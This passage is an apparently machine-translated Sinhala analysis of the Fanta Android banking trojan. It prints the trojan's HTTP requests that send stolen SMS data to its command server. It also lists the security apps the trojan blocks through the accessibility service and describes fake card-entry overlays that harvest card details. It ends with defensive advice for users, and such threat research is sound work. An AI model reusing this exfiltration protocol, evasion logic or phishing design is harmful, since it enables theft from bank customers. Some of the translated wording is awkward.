• වර්ගය සමඟ පණිවිඩයක් යැවීම setSmsStatus. විධානය ක්‍රියාත්මක කිරීමෙන් පසුව මෙම ඉල්ලීම සිදු කෙරේ SMS පණිවිඩයක් යවන්න. ඉල්ලීම මේ වගේ ය:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

• දත්ත සමුදායේ අන්තර්ගතය උඩුගත කිරීම. ඉල්ලීමකට එක් පේළියක් සම්ප්‍රේෂණය වේ. පහත දත්ත සේවාදායකයට යවනු ලැබේ:
  · කුකීස් - සේවාදායකයෙන් ලැබුණු කුකීස්
  · මාදිලිය - තන්තු නියතය setSaveInboxSms
  · ලංසුව - ඉල්ලීම යැවීමේදී ලැබුණු ආසාදිත උපාංගයේ හැඳුනුම්පත ලියාපදිංචි_බොට්
  · පෙළ - වත්මන් දත්ත සමුදා වාර්තාවේ පෙළ (ක්ෂේත්‍ර d මේසයෙන් සටහන් දත්ත සමුදායේ а)
  · අංකය - වත්මන් දත්ත සමුදා වාර්තාවේ නම (ක්ෂේත්‍රය p මේසයෙන් සටහන් දත්ත සමුදායේ а)
  · sms_mode — පූර්ණ සංඛ්යා අගය (ක්ෂේත්ර m මේසයෙන් සටහන් දත්ත සමුදායේ а)

  ඉල්ලීම මේ වගේ ය:

  POST /controller.php HTTP/1.1
  Cookie:
  Content-Type: application/x-www-form-urlencoded
  Host: onuseseddohap.club
  Connection: close
  Accept-Encoding: gzip, deflate
  User-Agent: okhttp/3.6.0
  
  mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

  සේවාදායකය වෙත සාර්ථකව යවනු ලැබුවහොත්, පේළිය වගුවෙන් මකා දැමෙනු ඇත. සේවාදායකය විසින් ආපසු ලබා දුන් JSON වස්තුවක උදාහරණය:

  {
      "response":[],
      "status":"ok"
  }

ප්‍රවේශ්‍යතා සේවාව සමඟ අන්තර් ක්‍රියා කිරීම

ආබාධ සහිත පුද්ගලයන් සඳහා Android උපාංග භාවිතය පහසු කිරීමට ප්‍රවේශ්‍යතා සේවාව ක්‍රියාත්මක කරන ලදී. බොහෝ අවස්ථාවලදී, යෙදුමක් සමඟ අන්තර් ක්රියා කිරීම සඳහා භෞතික අන්තර්ක්රියා අවශ්ය වේ. ප්‍රවේශ්‍යතා සේවාව ඔබට ඒවා ක්‍රමලේඛනාත්මකව කිරීමට ඉඩ සලසයි. Fanta විසින් බැංකු යෙදුම්වල ව්‍යාජ කවුළු නිර්මාණය කිරීමට සහ පද්ධති සැකසුම් සහ සමහර යෙදුම් විවෘත කිරීමෙන් පරිශීලකයින් වලක්වා ගැනීමට මෙම සේවාව භාවිතා කරයි.

ප්‍රවේශ්‍යතා සේවාවේ ක්‍රියාකාරීත්වය භාවිතා කරමින්, ට්‍රෝජන් ආසාදිත උපාංගයේ තිරයේ ඇති මූලද්‍රව්‍යවලට සිදුවන වෙනස්කම් නිරීක්ෂණය කරයි. පෙර විස්තර කර ඇති පරිදි, ෆැන්ටා සැකසුම් සංවාද කොටු සමඟ ලොග් මෙහෙයුම් සඳහා වගකිව යුතු පරාමිතියක් අඩංගු වේ - ඩයලොග් කියවන්න. මෙම පරාමිතිය සකසා ඇත්නම්, සිදුවීම අවුලුවාලූ පැකේජයේ නම සහ විස්තරය පිළිබඳ තොරතුරු දත්ත සමුදායට එක් කරනු ලැබේ. සිදුවීම් අවුලුවන විට ට්‍රෝජන් පහත ක්‍රියා සිදු කරයි:

• පහත සඳහන් අවස්ථා වලදී පසුපස සහ නිවසේ යතුරු එබීම අනුකරණය කරයි:
  · පරිශීලකයාට ඔහුගේ උපාංගය නැවත ආරම්භ කිරීමට අවශ්‍ය නම්
  · පරිශීලකයාට "Avito" යෙදුම මකා දැමීමට හෝ ප්රවේශ අයිතිවාසිකම් වෙනස් කිරීමට අවශ්ය නම්
  · පිටුවේ "Avito" යෙදුම පිළිබඳ සඳහනක් තිබේ නම්
  · Google Play Protect යෙදුම විවෘත කරන විට
  · ප්‍රවේශ්‍යතා සේවා සැකසුම් සහිත පිටු විවෘත කරන විට
  · පද්ධති ආරක්ෂණ සංවාද කොටුව දිස්වන විට
  · "වෙනත් යෙදුම මත ඇඳීම" සැකසීම් සමඟ පිටුව විවෘත කරන විට
  · "යෙදුම්" පිටුව විවෘත කරන විට, "ප්රතිසාධනය සහ යළි පිහිටුවීම", "දත්ත යළි පිහිටුවීම", "සැකසීම් යළි පිහිටුවීම", "සංවර්ධක පැනලය", "විශේෂ. අවස්ථා", "විශේෂ අවස්ථා", "විශේෂ අයිතිවාසිකම්"
  · සිදුවීම ඇතැම් යෙදුම් මගින් ජනනය කර ඇත්නම්.

  යෙදුම් ලැයිස්තුව

  • ඇන්ඩ්රොයිඩ්
  • මාස්ටර් ලයිට්
  • පිරිසිදු ස්වාමියා
  • x86 CPU සඳහා Clean Master
  • Meizu යෙදුම් අවසර කළමනාකරණය
  • MIUI ආරක්ෂාව
  • පිරිසිදු මාස්ටර් - ප්‍රති-වයිරස සහ හැඹිලි සහ කුණු පිරිසිදු කරන්නා
  • මාපිය පාලන සහ GPS: Kaspersky SafeKids
  • Kaspersky Antivirus AppLock සහ Web Security Beta
  • වෛරස් පිරිසිදු කරන්නා, ප්රතිවයිරස, පිරිසිදු කරන්නා (MAX ආරක්ෂාව)
  • ජංගම ප්රතිවයිරස ආරක්ෂක PRO
  • Avast ප්‍රති-වයිරස සහ නිදහස් ආරක්ෂාව 2019
  • ජංගම ආරක්ෂාව MegaFon
  • Xperia සඳහා AVG ආරක්ෂණය
  • ජංගම ආරක්ෂාව
  • Malwarebytes Antivirus & Protection
  • Android 2019 සඳහා ප්‍රති-වයිරස
  • ආරක්ෂක මාස්ටර් - ප්රතිවයිරස, VPN, AppLock, Booster
  • Huawei ටැබ්ලට් පද්ධති කළමනාකරු සඳහා AVG ප්‍රති-වයිරස
  • Samsung ප්‍රවේශ්‍යතාව
  • Samsung Smart Manager
  • ආරක්ෂක මාස්ටර්
  • වේග බූස්ටරය
  • ආචාර්ය වෙබ්
  • Dr.Web ආරක්ෂක අවකාශය
  • Dr.Web ජංගම පාලන මධ්‍යස්ථානය
  • Dr.Web Security Space Life
  • Dr.Web ජංගම පාලන මධ්‍යස්ථානය
  • ප්‍රති -වයිරස සහ ජංගම ආරක්‍ෂාව
  • Kaspersky අන්තර්ජාල ආරක්ෂාව: ප්රතිවයිරස සහ ආරක්ෂාව
  • Kaspersky Battery Life: Saver & Booster
  • Kaspersky Endpoint Security - ආරක්ෂාව සහ කළමනාකරණය
  • AVG Antivirus නොමිලේ 2019 - Android සඳහා ආරක්ෂාව
  • ප්‍රති-වයිරස ඇන්ඩ්‍රොයිඩ්
  • Norton Mobile Security සහ Antivirus
  • ප්රතිවයිරස, ෆයර්වෝල්, VPN, ජංගම ආරක්ෂාව
  • ජංගම ආරක්ෂාව: ප්රතිවයිරස, VPN, සොරකම් ආරක්ෂාව
  • Android සඳහා ප්‍රති-වයිරස

• කෙටි අංකයකට SMS පණිවිඩයක් යැවීමේදී අවසරය ඉල්ලා සිටින්නේ නම්, Fanta තේරීම් කොටුව මත ක්ලික් කිරීම අනුකරණය කරයි තේරීම මතක තබා ගන්න සහ බොත්තම යැවීමට.
• ඔබ ට්‍රෝජන් වෙතින් පරිපාලක අයිතිවාසිකම් ඉවත් කිරීමට උත්සාහ කරන විට, එය දුරකථන තිරය අගුළු දමයි.
• නව පරිපාලකයින් එකතු කිරීම වළක්වයි.
• ප්රතිවයිරස යෙදුම නම් dr.web තර්ජනයක් හඳුනාගෙන, Fanta බොත්තම එබීමෙන් අනුකරණය කරයි නොසලකා හරිනවා.
• ට්‍රෝජන් වැඩසටහන මඟින් සිදුවීම ජනනය කළේ නම් පසුපස සහ මුල් බොත්තම එබීම අනුකරණය කරයි Samsung උපාංග සත්කාරය.
• Fanta විසින් විවිධ අන්තර්ජාල සේවා 30ක පමණ ලැයිස්තුවකින් යෙදුමක් දියත් කර ඇත්නම් බැංකු කාඩ්පත් පිළිබඳ තොරතුරු ඇතුළත් කිරීම සඳහා පෝරම සහිත තතුබෑම් කවුළු නිර්මාණය කරයි. ඒවා අතර: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, ආදිය.
  

  තතුබෑම් ආකෘති

  ආසාදිත උපාංගයේ ක්‍රියාත්මක වන්නේ කුමන යෙදුම්ද යන්න ෆැන්ටා විශ්ලේෂණය කරයි. උනන්දුවක් දක්වන යෙදුමක් විවෘත කර ඇත්නම්, ට්‍රෝජන් අනෙක් සියල්ලටම ඉහළින් තතුබෑම් කවුළුවක් පෙන්වයි, එය බැංකු කාඩ්පත් තොරතුරු ඇතුළත් කිරීමේ පෝරමයකි. පරිශීලකයා පහත දත්ත ඇතුළත් කළ යුතුය:

  • කාඩ්පත් අංකය
  • කාඩ්පත කල් ඉකුත්වන දිනය
  • CVV
  • කාඩ්පත් හිමියාගේ නම (සියලු බැංකු සඳහා නොවේ)

  ධාවනය වන යෙදුම මත පදනම්ව, විවිධ තතුබෑම් කවුළු පෙන්වනු ඇත. ඒවායින් සමහරක් සඳහා උදාහරණ පහත දැක්වේ:

  Aliexpress:

  
  අවිටෝ:

  
  වෙනත් සමහර යෙදුම් සඳහා, උදා. Google Play Market, Aviasales, Pandao, Booking, Trivago:
  

  ඇත්තටම ඒක කොහොමද
  

  වාසනාවකට මෙන්, ලිපියේ ආරම්භයේ විස්තර කර ඇති SMS පණිවිඩය ලැබුණු පුද්ගලයා සයිබර් ආරක්ෂණ විශේෂඥයෙකු බවට පත් විය. එමනිසා, සැබෑ, අධ්‍යක්ෂක නොවන අනුවාදය කලින් පැවසූ දෙයට වඩා වෙනස් ය: පුද්ගලයෙකුට සිත්ගන්නා කෙටි පණිවුඩයක් ලැබුණි, පසුව ඔහු එය Group-IB Threat Hunting Intelligence කණ්ඩායමට ලබා දුන්නේය. එම ප්‍රහාරයේ ප්‍රතිඵලය මෙම ලිපියයි. සතුටුදායක අවසානයක් නේද? කෙසේ වෙතත්, සියලුම කථා එතරම් සාර්ථකව අවසන් නොවන අතර, ඔබේ මුදල් අලාභයක් සමඟ අධ්‍යක්ෂකවරයෙකුගේ කප්පාදුවක් ලෙස නොපෙනේ, බොහෝ අවස්ථාවල දී පහත දිගු විස්තර කර ඇති නීති රීති පිළිපැදීම ප්‍රමාණවත් වේ:

  • Google Play හැර වෙනත් මූලාශ්‍රවලින් Android OS සහිත ජංගම උපාංගයක් සඳහා යෙදුම් ස්ථාපනය නොකරන්න
  • යෙදුමක් ස්ථාපනය කරන විට, යෙදුම විසින් ඉල්ලා සිටින අයිතිවාසිකම් කෙරෙහි විශේෂ අවධානයක් යොමු කරන්න
  • බාගත කළ ගොනු වල දිගු වෙත අවධානය යොමු කරන්න
  • Android OS යාවත්කාලීන නිතිපතා ස්ථාපනය කරන්න
  • සැක සහිත සම්පත් වෙත නොපැමිණෙන අතර එහි ඇති ගොනු බාගත නොකරන්න
  • SMS පණිවිඩවල ලැබෙන සබැඳි මත ක්ලික් නොකරන්න.

මූලාශ්රය: www.habr.com